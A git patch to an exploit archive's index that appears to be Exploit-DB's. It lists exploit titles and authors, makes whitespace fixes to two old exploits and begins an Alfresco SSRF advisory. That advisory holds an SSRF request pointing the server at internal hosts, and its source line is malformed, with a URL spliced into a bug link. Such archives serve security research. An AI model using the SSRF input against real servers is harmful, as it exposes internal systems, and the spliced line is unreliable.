From 93d901f3b25113f27796e757bc503654a21bf256 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 19 Jan 2016 05:03:22 +0000 Subject: [PATCH] DB: 2016-01-19 10 new exploits --- files.csv | 50 ++++---- platforms/linux/remote/107.c | 6 +- platforms/linux/remote/43.pl | 6 +- platforms/multiple/remote/39258.txt | 9 ++ platforms/multiple/remote/39259.txt | 9 ++ platforms/multiple/remote/8037.txt | 34 +++--- platforms/php/webapps/39255.html | 16 +++ platforms/php/webapps/39256.txt | 10 ++ platforms/php/webapps/39257.txt | 9 ++ platforms/php/webapps/39261.txt | 180 ++++++++++++++++++++++++++++ platforms/php/webapps/39262.txt | 139 +++++++++++++++++++++ platforms/php/webapps/39263.txt | 113 +++++++++++++++++ platforms/php/webapps/39266.txt | 105 ++++++++++++++++ platforms/windows/local/39260.txt | 66 ++++++++++ 14 files changed, 709 insertions(+), 43 deletions(-) create mode 100755 platforms/multiple/remote/39258.txt create mode 100755 platforms/multiple/remote/39259.txt create mode 100755 platforms/php/webapps/39255.html create mode 100755 platforms/php/webapps/39256.txt create mode 100755 platforms/php/webapps/39257.txt create mode 100755 platforms/php/webapps/39261.txt create mode 100755 platforms/php/webapps/39262.txt create mode 100755 platforms/php/webapps/39263.txt create mode 100755 platforms/php/webapps/39266.txt create mode 100755 platforms/windows/local/39260.txt diff --git a/files.csv b/files.csv index d835a1e5a..ed1997e9a 100755 --- a/files.csv +++ b/files.csv @@ -41,7 +41,7 @@ id,file,description,date,author,platform,type,port 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,N/A,linux,local,0 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25 -43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21 +43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection password disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - Remote Exploit (DSR-ducky.c)",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow Exploit",2003-06-27,B-r00t,linux,remote,25 @@ -104,7 +104,7 @@ id,file,description,date,author,platform,type,port 104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit",2003-09-27,kokanin,bsd,remote,5308 106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 -107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 +107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135 110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 @@ -367,7 +367,7 @@ id,file,description,date,author,platform,type,port 391,platforms/osx/remote/391.pl,"Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,N/A,linux,local,0 -394,platforms/linux/local/394.c,"ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl",2004-08-13,pi3,linux,local,0 +394,platforms/linux/local/394.c,"ProFTPd - Local pr_ctrls_connect Vulnerability (ftpdctl)",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM _Away_ Message Local Exploit",2004-08-14,mandragore,windows,local,0 396,platforms/bsd/local/396.c,"OpenBSD ftp Exploit (teso)",2002-01-01,Teso,bsd,local,0 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143 @@ -2533,7 +2533,7 @@ id,file,description,date,author,platform,type,port 2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability",2006-11-26,bolivar,asp,webapps,0 2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0 2855,platforms/windows/dos/2855.py,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0 -2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)",2006-11-27,"Evgeny Legerov",linux,remote,21 +2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow Exploit (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 2857,platforms/multiple/dos/2857.php,"PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC",2006-11-27,"Nick Kezhaya",multiple,dos,0 2858,platforms/linux/remote/2858.c,"Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit",2006-11-28,K-sPecial,linux,remote,0 2859,platforms/php/webapps/2859.php,"Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0 @@ -2602,7 +2602,7 @@ id,file,description,date,author,platform,type,port 2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0 2927,platforms/php/webapps/2927.txt,"PhpMyCMS <= 0.3 (basic.inc.php) Remote File Include Vulnerability",2006-12-13,v1per-haCker,php,webapps,0 -2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0 +2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a - (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0 2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0 2930,platforms/php/webapps/2930.pl,"yaplap <= 0.6.1b (ldap.php) Remote File Include Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0 2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Include Vulnerability",2006-12-14,ex0,php,webapps,0 @@ -2997,7 +2997,7 @@ id,file,description,date,author,platform,type,port 3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 (album) Remote SQL Injection Vulnerability",2007-02-17,Bl0od3r,php,webapps,0 3328,platforms/php/webapps/3328.htm,"S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit",2007-02-18,ajann,php,webapps,0 3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110 -3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit",2007-02-18,Revenge,linux,local,0 +3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (1)",2007-02-18,Revenge,linux,local,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC",2007-02-18,r0ut3r,windows,dos,0 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0 3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (2)",2007-02-19,Revenge,linux,local,0 @@ -3957,7 +3957,7 @@ id,file,description,date,author,platform,type,port 4309,platforms/php/webapps/4309.txt,"Joomla Component EventList <= 0.8 (did) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0 4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit",2007-08-23,ajann,php,webapps,0 4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0 -4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21 +4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit",2007-08-25,k1tk4t,php,webapps,0 4314,platforms/windows/local/4314.php,"PHP Perl Extension Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389 @@ -7565,7 +7565,7 @@ id,file,description,date,author,platform,type,port 8034,platforms/php/webapps/8034.txt,"Mynews 0_10 (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 FD / SQL Injection Command Execution Exploit",2009-02-10,Osirys,php,webapps,0 -8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0 +8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql - Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Remote Shell Upload Vulnerability",2009-02-11,ZoRLu,php,webapps,0 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities",2009-02-11,x0r,php,webapps,0 @@ -9414,7 +9414,7 @@ id,file,description,date,author,platform,type,port 10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0 10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0 10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0 -10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)",2009-10-12,"Michael Domberg",unix,local,0 +10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0 10045,platforms/php/webapps/10045.txt,"Community Translate File Inclusion Vulnerability",2009-10-12,NoGe,php,webapps,0 10046,platforms/php/webapps/10046.txt,"Dazzle Blast Remote File Inclusion",2009-10-12,NoGe,php,webapps,0 10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80 @@ -10789,7 +10789,7 @@ id,file,description,date,author,platform,type,port 11790,platforms/php/webapps/11790.txt,"Joomla Component com_vxdate Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps,0 11791,platforms/windows/local/11791.pl,"myMP3-Player 3.0 - (.m3u) Local Buffer Overflow Exploit (SEH)",2010-03-18,n3w7u,windows,local,0 11792,platforms/multiple/dos/11792.pl,"mplayer <= 4.4.1 NULL pointer dereference Exploit PoC",2010-03-18,"Pietro Oliva",multiple,dos,0 -11793,platforms/jsp/webapps/11793.txt,"Manage Engine Service Desk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 +11793,platforms/jsp/webapps/11793.txt,"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps,0 11794,platforms/windows/local/11794.c,"MediaCoder - (.lst file) Local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - LFI",2010-03-18,ITSecTeam,php,webapps,0 11797,platforms/windows/local/11797.py,"ZippHo 3.0.6 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-03-18,mr_me,windows,local,0 @@ -13439,7 +13439,7 @@ id,file,description,date,author,platform,type,port 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0 15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0 15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0 -15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 +15449,platforms/linux/remote/15449.pl,"ProFTPD IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21 15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0 @@ -13960,7 +13960,7 @@ id,file,description,date,author,platform,type,port 16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16127,platforms/php/webapps/16127.txt,"T-Content Managment System Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0 -16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0 +16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp - Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0 16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 (index.php) SQL Injection Vulnerability",2011-02-07,ahmadso,php,webapps,0 16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 @@ -14653,7 +14653,7 @@ id,file,description,date,author,platform,type,port 16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - _secure_ Overflow (Linux)",2010-09-20,metasploit,linux,remote,0 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,linux,remote,0 16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,metasploit,linux,remote,0 -16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0 +16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0 16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0 16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String Vulnerability",2010-04-30,metasploit,linux,remote,0 16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point apply.cgi Buffer Overflow",2010-09-24,metasploit,hardware,remote,0 @@ -14720,7 +14720,7 @@ id,file,description,date,author,platform,type,port 16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent net.tcp.listen Command Injection",2010-07-03,metasploit,freebsd,remote,0 16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0 16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,metasploit,linux,remote,0 -16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0 +16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c - Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0 16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0 16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0 16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0 @@ -15155,7 +15155,7 @@ id,file,description,date,author,platform,type,port 17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0 17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection Vulnerability",2011-06-23,"Brendan Coles",php,webapps,0 -17437,platforms/jsp/webapps/17437.txt,"manageengine service desk plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0 +17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17439,platforms/sh4/shellcode/17439.c,"SuperH (sh4) Add root user with password",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0 @@ -16869,7 +16869,7 @@ id,file,description,date,author,platform,type,port 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 X Library Buffer Overflow Vulnerability (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX <= 4.3.2_CDE <= 2.1_IRIX <= 6.5.14_Solaris <= 7.0_SunOS <= 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation Vulnerability",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 -19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0 +19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 - snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow Vulnerability",1999-09-21,"babcia padlina ltd",freebsd,local,0 19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,dos,0 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3_ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 @@ -17685,7 +17685,7 @@ id,file,description,date,author,platform,type,port 20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot eval() Remote Code Execution",2012-08-08,metasploit,php,remote,0 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",2012-08-08,metasploit,windows,remote,0 -20356,platforms/windows/webapps/20356.py,"ManageEngine Service Desk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 +20356,platforms/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20358,platforms/php/webapps/20358.py,"wordpress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0 20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 @@ -17858,7 +17858,7 @@ id,file,description,date,author,platform,type,port 20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability",2001-01-10,"Murat - 2",multiple,dos,0 20535,platforms/linux/dos/20535.txt,"ReiserFS 3.5.28 Kernel - DoS (Possible Code Execution Vulnerability)",2001-01-09,"Marc Lehmann",linux,dos,0 -20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0 +20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 - SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0 20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload Vulnerability",2012-08-15,ICheer_No0M,php,webapps,0 @@ -19339,7 +19339,7 @@ id,file,description,date,author,platform,type,port 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0 22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 -22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 +22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 22082,platforms/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 Mail Scanner Buffer Overflow Vulnerability",2002-12-10,"Joel Soderberg",windows,remote,0 @@ -20397,7 +20397,7 @@ id,file,description,date,author,platform,type,port 23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 Headers Prescan Denial of Service Vulnerability",1998-12-12,marchew,irix,dos,0 23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation Vulnerability",2003-09-22,"Sebastian Krahmer",linux,local,0 23169,platforms/windows/dos/23169.pl,"wzdftpd 0.1 rc5 Login Remote Denial of Service Vulnerability",2003-09-23,"Moran Zavdi",windows,dos,0 -23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0 +23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0 23171,platforms/linux/remote/23171.c,"MPG123 0.59 - Remote File Play Heap Corruption Vulnerability",2003-09-23,V9,linux,remote,0 23172,platforms/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 SQL-GW Connection Denial of Service Vulnerability",2003-09-24,"Oliver Heinz and Thomas Neuderth",linux,dos,0 23173,platforms/multiple/remote/23173.txt,"TCLhttpd 3.4.2 - Directory Listing Disclosure Vulnerability",2003-09-24,"Phuong Nguyen",multiple,remote,0 @@ -35500,3 +35500,13 @@ id,file,description,date,author,platform,type,port 39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0 39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0 39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0 +39255,platforms/php/webapps/39255.html,"WEBMIS CMS Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0 +39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/treemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 +39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/zoomabletreemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 +39258,platforms/multiple/remote/39258.txt,"Alfresco /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0 +39259,platforms/multiple/remote/39259.txt,"Alfresco /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0 +39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0 +39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - CSRF Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80 +39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent XSS Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80 +39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - RFI / CSRF Vulnerability",2016-01-18,hyp3rlinx,php,webapps,80 +39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443 diff --git a/platforms/linux/remote/107.c b/platforms/linux/remote/107.c index c9859ebb5..f30743c44 100755 --- a/platforms/linux/remote/107.c +++ b/platforms/linux/remote/107.c @@ -779,6 +779,6 @@ int checklf(void *sd,int len) return 0; } - - -// milw0rm.com [2003-10-04] + + +// milw0rm.com [2003-10-04] diff --git a/platforms/linux/remote/43.pl b/platforms/linux/remote/43.pl index 81973b6f5..b7d822e8a 100755 --- a/platforms/linux/remote/43.pl +++ b/platforms/linux/remote/43.pl @@ -42,6 +42,6 @@ if($line =~ /230/){ #logged in }else{ print "[------- Sql Inject Unable \n"; } -close $remote; - -# milw0rm.com [2003-06-19] +close $remote; + +# milw0rm.com [2003-06-19] diff --git a/platforms/multiple/remote/39258.txt b/platforms/multiple/remote/39258.txt new file mode 100755 index 000000000..da8d546a1 --- /dev/null +++ b/platforms/multiple/remote/39258.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info + +Alfresco Community Edition is prone to multiple security vulnerabilities. + +An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions. + 